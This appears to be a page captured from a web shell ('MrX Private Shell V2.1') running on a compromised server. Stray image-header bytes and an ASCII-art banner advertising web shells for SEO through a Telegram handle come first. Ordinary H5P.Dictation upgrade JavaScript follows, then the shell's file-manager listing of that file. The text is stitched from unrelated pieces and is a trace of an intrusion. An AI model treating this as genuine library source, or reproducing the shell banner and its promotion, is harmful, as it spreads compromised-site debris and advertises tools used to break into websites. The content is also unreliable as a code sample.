����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
var H5PUpgrades = H5PUpgrades || {};
H5PUpgrades['H5P.Dictation'] = (function () {
return {
1: {
/**
* Asynchronous content upgrade hook.
*
* Move parameters in Behavioural Settings.
* Correct use of enableSolution => enableSolutionsButton
*
* @param {object} parameters
* @param {function} finished
* @param extras
*/
1: function (parameters, finished, extras) {
if (parameters && parameters.behaviour) {
const behaviour = parameters.behaviour;
behaviour.scoring = {
ignorePunctuation: (typeof behaviour.ignorePunctuation === 'boolean') ? behaviour.ignorePunctuation : true,
zeroMistakeMode: (typeof behaviour.zeroMistakeMode === 'boolean') ? behaviour.zeroMistakeMode : false,
typoFactor: behaviour.typoFactor || '100'
};
behaviour.textual = {
wordSeparator: behaviour.wordSeparator || ' ',
overrideRTL: behaviour.overrideRTL || 'auto',
autosplit: (typeof behaviour.autosplit === 'boolean') ? behaviour.autosplit : true
};
behaviour.feedbackPresentation = {
customTypoDisplay: (typeof behaviour.customTypoDisplay === 'boolean') ? behaviour.customTypoDisplay : false,
alternateSolution: behaviour.alternateSolution || 'first'
};
behaviour.enableSolutionsButton = (typeof behaviour.enableSolution === 'boolean') ? behaviour.enableSolution : true;
delete behaviour.ignorePunctuation;
delete behaviour.zeroMistakeMode;
delete behaviour.typoFactor;
delete behaviour.wordSeparator;
delete behaviour.overrideRTL;
delete behaviour.autosplit;
delete behaviour.customTypoDisplay;
delete behaviour.alternateSolution;
delete behaviour.enableSolution;
}
finished(null, parameters, extras);
}
}
};
})();
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| a581c0137fd9b4b4d5ee75ef24f2c3cf3f7c59dd | File | 1.94 KB | 0666 |
|